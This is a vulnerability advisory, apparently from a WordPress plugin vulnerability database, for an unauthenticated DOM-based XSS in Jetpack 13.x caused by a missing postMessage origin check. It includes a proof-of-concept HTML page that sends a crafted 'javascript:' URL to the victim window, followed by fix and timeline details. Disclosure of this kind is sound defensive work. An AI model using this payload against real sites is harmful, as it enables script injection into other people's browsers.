Jetpack 13.0-14.0 – Unauthenticated DOM-XSS | CVE 2024-10858 | Plugin Vulnerabilities

Description

The plugin does not properly checks the postmessage origin in its 13.x versions, allowing it to be bypassed and leading to DOM-XSS. The issue only affects websites hosted on WordPress.com.

Proof of Concept

To bypass the original check, host the below payload on http://<WP.COM-Hosted-website>.xxxx.burp.bio/

<html>
<script>
  window.addEventListener("click", e => {
    let vuln_window = window.open("https://<WP.COM-Hosted-website>/");
    setInterval(x=>{
      vuln_window.postMessage({'type':'subscriptionModalShow','data':{'email':'google@google.com','url':'javascript://<WP.COM-Hosted-website>/%0Aalert()'}},'*');
    },100)
  })
  </script>
</html>

Affects Plugins

Fixed in 14.1-a.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Eldar (hakupiku)

Submitter

Eldar (hakupiku)

Verified

Yes

WPVDB ID

7fecba37-d718-4dd4-89f3-285fb36a4165

Timeline

Publicly Published

2024-12-04 (about 1 year ago)

Added

2024-12-04 (about 1 year ago)

Last Updated

2024-12-04 (about 1 year ago)

Other

Published

Title

Published

2023-07-20

Title

Gestion-Pymes <= 1.5.6 - Admin+ Stored XSS

Published

2024-10-16

Title

Flexmls® IDX Plugin < 3.14.23 - Reflected Cross-Site Scripting

Published

2024-10-03

Title

Product Delivery Date for WooCommerce – Lite < 2.7.4 - Reflected Cross-Site Scripting

Published

2014-10-13

Title

Smart Forms 2.1.0 - Cross-Site Scripting (XSS)

Published

2024-06-05

Title

Video Widget <= 1.2.3 - Admin+ Stored XSS via Widget